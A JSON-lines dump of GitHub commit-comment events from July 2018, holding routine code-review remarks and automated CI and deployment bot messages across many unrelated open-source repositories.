{"id":"7939806642","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29647023,"position":null,"line":null,"path":null,"commit_id":"3f8e5c925cb7beb73d42826b27e3e875c8eace60","created_at":"2018-07-09T20:05:40Z","updated_at":"2018-07-09T20:05:40Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `coverage`    |     0.12 |\n| `texts_total` |    -4    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng1.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng2.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0023/tlg001/tlg0023.tlg001.perseus-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4430)*\n"}},"created_at":"2018-07-09T20:05:40Z"}
{"id":"7939811045","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29647028,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T20:06:35Z","updated_at":"2018-07-09T20:06:35Z","author_association":"MEMBER","body":"> Maybe due to the apostrophe in doesn't at line 220? I saw the same UTF-8 code at that line.\r\n\r\nLanded in 685dc3c, thanks again."}},"created_at":"2018-07-09T20:06:35Z"}
{"id":"7939814840","type":"CommitCommentEvent","actor":{"login":"gdbrown"},"repo":{"name":"triniti/notify-php"},"payload":{"comment":{"id":29647038,"position":43,"line":43,"path":"src/Notifier/AppleNews/Component/Gallery.php","commit_id":"463bbf2c7832a0a040e76687dceb2c79ef9a4367","created_at":"2018-07-09T20:07:24Z","updated_at":"2018-07-09T20:07:24Z","author_association":"CONTRIBUTOR","body":"@bhsiao55 don't need this assertion, the typehint already forces it.  also, the public props should be protected on this class"}},"created_at":"2018-07-09T20:07:24Z"}
{"id":"7939816277","type":"CommitCommentEvent","actor":{"login":"gdbrown"},"repo":{"name":"triniti/notify-php"},"payload":{"comment":{"id":29647042,"position":59,"line":59,"path":"src/Notifier/AppleNews/Component/Gallery.php","commit_id":"463bbf2c7832a0a040e76687dceb2c79ef9a4367","created_at":"2018-07-09T20:07:44Z","updated_at":"2018-07-09T20:07:44Z","author_association":"CONTRIBUTOR","body":"@bhsiao55 change to `addItems`"}},"created_at":"2018-07-09T20:07:44Z"}
{"id":"7939820058","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/joommf-feedstock"},"payload":{"comment":{"id":29647050,"position":null,"line":null,"path":null,"commit_id":"2f285343cc218f1d1e3030d9a25076a65a758bc5","created_at":"2018-07-09T20:08:31Z","updated_at":"2018-07-09T20:08:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T20:08:31Z"}
{"id":"7939820734","type":"CommitCommentEvent","actor":{"login":"gdbrown"},"repo":{"name":"triniti/notify-php"},"payload":{"comment":{"id":29647051,"position":21,"line":21,"path":"src/Notifier/AppleNews/Component/Gallery.php","commit_id":"463bbf2c7832a0a040e76687dceb2c79ef9a4367","created_at":"2018-07-09T20:08:39Z","updated_at":"2018-07-09T20:08:39Z","author_association":"CONTRIBUTOR","body":"@bhsiao55 you may not need this, probably handle it in using assertions in a validate method more directly."}},"created_at":"2018-07-09T20:08:39Z"}
{"id":"7939821091","type":"CommitCommentEvent","actor":{"login":"melissa"},"repo":{"name":"puppetlabs/puppetlabs-yumrepo_core"},"payload":{"comment":{"id":29647052,"position":15,"line":29,"path":".travis.yml","commit_id":"582f02315fba06f001eb3a9ce114c087d7aee00e","created_at":"2018-07-09T20:08:44Z","updated_at":"2018-07-09T20:08:44Z","author_association":"MEMBER","body":"Same with this\r\n```\r\n.travis.yml:\r\n  remove_includes:\r\n    - env: PUPPET_GEM_VERSION=\"~> 4.0\" CHECK=parallel_spec\r\n      rvm: 2.1.9\r\n```"}},"created_at":"2018-07-09T20:08:44Z"}
{"id":"7939821995","type":"CommitCommentEvent","actor":{"login":"gdbrown"},"repo":{"name":"triniti/notify-php"},"payload":{"comment":{"id":29647054,"position":15,"line":15,"path":"src/Notifier/AppleNews/Component/Gallery.php","commit_id":"463bbf2c7832a0a040e76687dceb2c79ef9a4367","created_at":"2018-07-09T20:08:55Z","updated_at":"2018-07-09T20:08:55Z","author_association":"CONTRIBUTOR","body":"@bhsiao55 can probably nix this too and just make it part of (de)serialization"}},"created_at":"2018-07-09T20:08:55Z"}
{"id":"7939830189","type":"CommitCommentEvent","actor":{"login":"sharondenisse"},"repo":{"name":"sharondenisse/JupyNotes"},"payload":{"comment":{"id":29647062,"position":null,"line":null,"path":null,"commit_id":"e1d7547ab950775d0af0bb3bd360661748aaf4e7","created_at":"2018-07-09T20:10:36Z","updated_at":"2018-07-09T20:10:36Z","author_association":"OWNER","body":"@SharonDKenny - Are you there?  Hellooooooo!"}},"created_at":"2018-07-09T20:10:36Z"}
{"id":"7939835868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29647067,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T20:11:49Z","updated_at":"2018-07-09T20:11:49Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2931 of 2931 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T20:11:49Z"}
{"id":"7939840405","type":"CommitCommentEvent","actor":{"login":"wsdfz"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29647070,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-09T20:12:44Z","updated_at":"2018-07-09T20:12:44Z","author_association":"CONTRIBUTOR","body":"旧版本那个按钮有bug。刚上传的新版已经修复了。目前的demo版更新都要把之前的删了再下载，所以更新前务必备份好私钥（用的帐号、密码模式就不用）。另外，冷钱包不用更新。"}},"created_at":"2018-07-09T20:12:44Z"}
{"id":"7939840985","type":"CommitCommentEvent","actor":{"login":"TwitchBronBron"},"repo":{"name":"TwitchBronBron/brightscript-formatter"},"payload":{"comment":{"id":29647072,"position":null,"line":null,"path":null,"commit_id":"de4b96d1bd2f7118415e49ea16507294c58b7a0f","created_at":"2018-07-09T20:12:51Z","updated_at":"2018-07-09T20:12:51Z","author_association":"OWNER","body":"Fixes #9 "}},"created_at":"2018-07-09T20:12:51Z"}
{"id":"7939846958","type":"CommitCommentEvent","actor":{"login":"felipemcg"},"repo":{"name":"felipemcg/cmdFirmwareESP8266"},"payload":{"comment":{"id":29647084,"position":null,"line":null,"path":null,"commit_id":"61455e4012c588b027340b548d570d16a1af5833","created_at":"2018-07-09T20:14:05Z","updated_at":"2018-07-09T20:14:05Z","author_association":"OWNER","body":"Aguanto 1 hora y 20 minutos enviando \"Hola\" a un servidor en mi PC (Termine la prueba, no es que hubo alguna falla)"}},"created_at":"2018-07-09T20:14:05Z"}
{"id":"7939847199","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29647085,"position":null,"line":null,"path":null,"commit_id":"98815294ca621b372ece2d376777ed074330d5db","created_at":"2018-07-09T20:14:08Z","updated_at":"2018-07-09T20:14:08Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/98815294ca621b372ece2d376777ed074330d5db)\n\nBuilt at __20180709 - 20:14:08__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 529s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 847s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 923s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 547s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 270s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 286s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 726s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 393s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 761s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1149s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 415s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 284s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 383s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 260s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1109s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-rebeast/77//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1188s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-09T20:14:08Z"}
{"id":"7939852849","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29647090,"position":null,"line":null,"path":null,"commit_id":"cea2d0b8aa822b4790bac3924c6b42070e8f9936","created_at":"2018-07-09T20:15:18Z","updated_at":"2018-07-09T20:15:18Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-1](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-09T20:15:18Z"}
{"id":"7939855431","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647100,"position":null,"line":null,"path":null,"commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:15:49Z","updated_at":"2018-07-09T20:15:49Z","author_association":"MEMBER","body":"Why not just keep `version = ...` and reference that? `$project.version`"}},"created_at":"2018-07-09T20:15:49Z"}
{"id":"7939856100","type":"CommitCommentEvent","actor":{"login":"starriebird"},"repo":{"name":"starriebird/electrocoreandmorepantheon"},"payload":{"comment":{"id":29647101,"position":null,"line":null,"path":null,"commit_id":"4d84ef0bc2f1e4d82fb0a0c07702e53ece959ea9","created_at":"2018-07-09T20:15:58Z","updated_at":"2018-07-09T20:15:58Z","author_association":"OWNER","body":"Created multidev environment [electrocoreandmorepantheon#ci-2](https://dashboard.pantheon.io/sites/6883b40c-be34-4383-9eaf-304ef4effd14#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-electrocoreandmorepantheon.pantheonsite.io/)"}},"created_at":"2018-07-09T20:15:58Z"}
{"id":"7939856607","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29647103,"position":null,"line":null,"path":null,"commit_id":"7af531de77b5f0e5b23843e16f520078d6351d93","created_at":"2018-07-09T20:16:04Z","updated_at":"2018-07-09T20:16:04Z","author_association":"OWNER","body":"Why nintendo? \r\nWhat's the reason?\r\nSecurity? Version verifier?"}},"created_at":"2018-07-09T20:16:04Z"}
{"id":"7939856686","type":"CommitCommentEvent","actor":{"login":"git1318"},"repo":{"name":"git1318/springexample"},"payload":{"comment":{"id":29647104,"position":null,"line":null,"path":null,"commit_id":"0474a0cb9ecf7c92f9be614c9317aad1024c7cc5","created_at":"2018-07-09T20:16:05Z","updated_at":"2018-07-09T20:16:05Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-09T20:16:05Z"}
{"id":"7939860962","type":"CommitCommentEvent","actor":{"login":"AshrafulalamRasel"},"repo":{"name":"AshrafulalamRasel/MeetingSchedule"},"payload":{"comment":{"id":29647113,"position":null,"line":null,"path":null,"commit_id":"16d25e9175e6a0db7283db675b2a94202440789f","created_at":"2018-07-09T20:16:58Z","updated_at":"2018-07-09T20:16:58Z","author_association":"OWNER","body":"localhost:8080/login-user"}},"created_at":"2018-07-09T20:16:58Z"}
{"id":"7939866033","type":"CommitCommentEvent","actor":{"login":"neutmute"},"repo":{"name":"neutmute/ConfigurationSectionDesigner"},"payload":{"comment":{"id":29647125,"position":null,"line":null,"path":null,"commit_id":"c24394c3596ecd3bd0fa5b36812756c5693d8a3d","created_at":"2018-07-09T20:18:01Z","updated_at":"2018-07-09T20:18:01Z","author_association":"OWNER","body":"Hey - this is just a fork of the main project which I was playing around with. I didn't PR these changes as they weren't production ready"}},"created_at":"2018-07-09T20:18:01Z"}
{"id":"7939872906","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29647143,"position":null,"line":null,"path":null,"commit_id":"e3a086de8a91a856eafda4719d226bf52e16b700","created_at":"2018-07-09T20:19:28Z","updated_at":"2018-07-09T20:19:28Z","author_association":"COLLABORATOR","body":"you use tabs i see"}},"created_at":"2018-07-09T20:19:28Z"}
{"id":"7939876143","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Counter"},"payload":{"comment":{"id":29647158,"position":null,"line":null,"path":null,"commit_id":"183a0be5b297f4fb49ac6995afea40601f87b87a","created_at":"2018-07-09T20:20:10Z","updated_at":"2018-07-09T20:20:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the project by following instructions MVP only](https://trello.com/c/vnbZQiAa/3-complete-the-project-by-following-instructions-mvp-only)"}},"created_at":"2018-07-09T20:20:10Z"}
{"id":"7939876706","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Counter"},"payload":{"comment":{"id":29647159,"position":null,"line":null,"path":null,"commit_id":"c9637a01f57b868482161877338673a40ef66019","created_at":"2018-07-09T20:20:16Z","updated_at":"2018-07-09T20:20:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the project by following instructions MVP only](https://trello.com/c/vnbZQiAa/3-complete-the-project-by-following-instructions-mvp-only)"}},"created_at":"2018-07-09T20:20:16Z"}
{"id":"7939878545","type":"CommitCommentEvent","actor":{"login":"tlongers"},"repo":{"name":"security-force-monitor/sfm-cms"},"payload":{"comment":{"id":29647163,"position":null,"line":null,"path":null,"commit_id":"ebb096eb7edefba4707e1227d55ed54e9aae4e32","created_at":"2018-07-09T20:20:39Z","updated_at":"2018-07-09T20:20:39Z","author_association":"MEMBER","body":"... oh god oh god? :)"}},"created_at":"2018-07-09T20:20:39Z"}
{"id":"7939880059","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29647169,"position":null,"line":null,"path":null,"commit_id":"8e824454249a611412bd70965b9fbb8ff81ec331","created_at":"2018-07-09T20:20:58Z","updated_at":"2018-07-09T20:20:58Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-4](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-09T20:20:58Z"}
{"id":"7939881393","type":"CommitCommentEvent","actor":{"login":"git1318"},"repo":{"name":"git1318/springexample"},"payload":{"comment":{"id":29647170,"position":null,"line":null,"path":null,"commit_id":"0474a0cb9ecf7c92f9be614c9317aad1024c7cc5","created_at":"2018-07-09T20:21:15Z","updated_at":"2018-07-09T20:21:15Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-09T20:21:15Z"}
{"id":"7939883862","type":"CommitCommentEvent","actor":{"login":"wwderw"},"repo":{"name":"inkstitch/inkstitch"},"payload":{"comment":{"id":29647175,"position":null,"line":null,"path":null,"commit_id":"16f9b012231f6a1f9e53a1ffb9cf04bc1f03d478","created_at":"2018-07-09T20:21:45Z","updated_at":"2018-07-09T20:21:45Z","author_association":"MEMBER","body":"What is going to be the protocol for attaching these new symbols to satin/run objects or are these like the start/end symbols and right now only for fill objects?"}},"created_at":"2018-07-09T20:21:45Z"}
{"id":"7939899281","type":"CommitCommentEvent","actor":{"login":"ydsood"},"repo":{"name":"ydsood/okta-dotnet-saml"},"payload":{"comment":{"id":29647207,"position":null,"line":null,"path":null,"commit_id":"13bc06bd845b72f99a9b425cfcd5a7b4fc9e39e4","created_at":"2018-07-09T20:24:58Z","updated_at":"2018-07-09T20:24:58Z","author_association":"OWNER","body":"Added Account controller to trigger login when the application is first opened. Still not sure how .NET knows that it needs to hit /account/login when the application is first loaded."}},"created_at":"2018-07-09T20:24:58Z"}
{"id":"7939916730","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"Grayson112233/resume"},"payload":{"comment":{"id":29647262,"position":53,"line":53,"path":"resume.tex","commit_id":"116191866450f3441806199a6a2405319b6cf640","created_at":"2018-07-09T20:28:38Z","updated_at":"2018-07-09T20:28:38Z","author_association":"NONE","body":"didn't start with `The`. rejected."}},"created_at":"2018-07-09T20:28:38Z"}
{"id":"7939920411","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/LeventePoth"},"payload":{"comment":{"id":29647279,"position":18,"line":18,"path":"Week-08/Day-03/disable.html","commit_id":"9387998a94b8f63473a6292ff5a9804115405586","created_at":"2018-07-09T20:29:23Z","updated_at":"2018-07-09T20:29:23Z","author_association":"NONE","body":"Do not use capital letters for HTML class names"}},"created_at":"2018-07-09T20:29:23Z"}
{"id":"7939922074","type":"CommitCommentEvent","actor":{"login":"jmb41076"},"repo":{"name":"jmb41076/sample-cloud-native-toolchain-tutorial-20180701114109917"},"payload":{"comment":{"id":29647284,"position":null,"line":null,"path":null,"commit_id":"c3369a15ad10aa8f3229cb28f699248709420574","created_at":"2018-07-09T20:29:44Z","updated_at":"2018-07-09T20:29:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/6c88e8aa-9e71-4b7d-8679-e5beb1bb034c?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701114109917\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/57be2cf6-e5b9-43f7-9edf-9838a25c4b65?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701114109917\") deployed [sample-cloud-native-toolchain-tutorial-20180701114109917](https://github.com/jmb41076/sample-cloud-native-toolchain-tutorial-20180701114109917/releases/tag/deploy-ibm-yp-us-south-JMB-Industries-test-20180709-202944 \"deploy-ibm-yp-us-south-JMB-Industries-test-20180709-202944\") to [test](https://console.bluemix.net/apps/e16a6a91-d631-4201-84d8-4fc08eef6547?env_id=ibm:yp:us-south \"ibm:yp:us-south:JMB Industries:test\"), including this commit"}},"created_at":"2018-07-09T20:29:44Z"}
{"id":"7939928751","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/LeventePoth"},"payload":{"comment":{"id":29647304,"position":55,"line":55,"path":"Week-08/Day-03/disable.html","commit_id":"9387998a94b8f63473a6292ff5a9804115405586","created_at":"2018-07-09T20:31:04Z","updated_at":"2018-07-09T20:31:04Z","author_association":"NONE","body":"Here as well: do not use capital letters for variable names. We use them for JS class names: `class Cat...`, but variable names are always in lowercase"}},"created_at":"2018-07-09T20:31:04Z"}
{"id":"7939929528","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/LeventePoth"},"payload":{"comment":{"id":29647306,"position":60,"line":60,"path":"Week-08/Day-03/disable.html","commit_id":"9387998a94b8f63473a6292ff5a9804115405586","created_at":"2018-07-09T20:31:13Z","updated_at":"2018-07-09T20:31:13Z","author_association":"NONE","body":";"}},"created_at":"2018-07-09T20:31:13Z"}
{"id":"7939929893","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/LeventePoth"},"payload":{"comment":{"id":29647308,"position":63,"line":63,"path":"Week-08/Day-03/disable.html","commit_id":"9387998a94b8f63473a6292ff5a9804115405586","created_at":"2018-07-09T20:31:17Z","updated_at":"2018-07-09T20:31:17Z","author_association":"NONE","body":";"}},"created_at":"2018-07-09T20:31:17Z"}
{"id":"7939936217","type":"CommitCommentEvent","actor":{"login":"abraxa"},"repo":{"name":"abraxa/libsigrokdecode"},"payload":{"comment":{"id":29647323,"position":20,"line":1037,"path":"instance.c","commit_id":"5ddf93c66d39d47f75276734a2341fdcda4f38ed","created_at":"2018-07-09T20:32:35Z","updated_at":"2018-07-09T20:32:35Z","author_association":"OWNER","body":"I'm not 100% sure about that line."}},"created_at":"2018-07-09T20:32:35Z"}
{"id":"7939941351","type":"CommitCommentEvent","actor":{"login":"jmb41076"},"repo":{"name":"jmb41076/sample-cloud-native-toolchain-tutorial-20180701114109917"},"payload":{"comment":{"id":29647337,"position":null,"line":null,"path":null,"commit_id":"c3369a15ad10aa8f3229cb28f699248709420574","created_at":"2018-07-09T20:33:39Z","updated_at":"2018-07-09T20:33:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/6c88e8aa-9e71-4b7d-8679-e5beb1bb034c?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701114109917\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/57be2cf6-e5b9-43f7-9edf-9838a25c4b65?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701114109917\") deployed [sample-cloud-native-toolchain-tutorial-20180701114109917](https://github.com/jmb41076/sample-cloud-native-toolchain-tutorial-20180701114109917/releases/tag/deploy-ibm-yp-us-south-JMB-Industries-prod-20180709-203338 \"deploy-ibm-yp-us-south-JMB-Industries-prod-20180709-203338\") to [prod](https://console.bluemix.net/apps/97961342-5360-44e3-8cd9-04d84f121d65?env_id=ibm:yp:us-south \"ibm:yp:us-south:JMB Industries:prod\"), including this commit"}},"created_at":"2018-07-09T20:33:39Z"}
{"id":"7939946135","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29647349,"position":null,"line":null,"path":null,"commit_id":"f3e3d799668da89b49c7e668fe20834484e3833f","created_at":"2018-07-09T20:34:34Z","updated_at":"2018-07-09T20:34:34Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-6](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-6-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-09T20:34:34Z"}
{"id":"7939946923","type":"CommitCommentEvent","actor":{"login":"zubairov"},"repo":{"name":"elasticio/odata-component"},"payload":{"comment":{"id":29647350,"position":null,"line":null,"path":null,"commit_id":"15d6366ed3d2cb8cf1e17f7e1f882ad7bdbef313","created_at":"2018-07-09T20:34:42Z","updated_at":"2018-07-09T20:34:42Z","author_association":"CONTRIBUTOR","body":"looks very good! Thanks!"}},"created_at":"2018-07-09T20:34:42Z"}
{"id":"7939947217","type":"CommitCommentEvent","actor":{"login":"javascriptkitty"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29647351,"position":null,"line":null,"path":null,"commit_id":"6e1fb91bd02abe0818cc4f93b0a32ec8d52e6d34","created_at":"2018-07-09T20:34:45Z","updated_at":"2018-07-09T20:34:45Z","author_association":"OWNER","body":"I have the array [e, b, i, i, l, , h, f, q, q, v]. after i use  array.join (\" \") it becomes \"ebiilhfqqv\". how to keep spaces??"}},"created_at":"2018-07-09T20:34:45Z"}
{"id":"7939948953","type":"CommitCommentEvent","actor":{"login":"GrayedFox"},"repo":{"name":"GrayedFox/vuepress"},"payload":{"comment":{"id":29647354,"position":6,"line":34,"path":"lib/app/app.js","commit_id":"dc321c90f9305f24891f8d8e094caddec3299bfe","created_at":"2018-07-09T20:35:05Z","updated_at":"2018-07-09T20:35:05Z","author_association":"OWNER","body":"just for debugging, should remove"}},"created_at":"2018-07-09T20:35:05Z"}
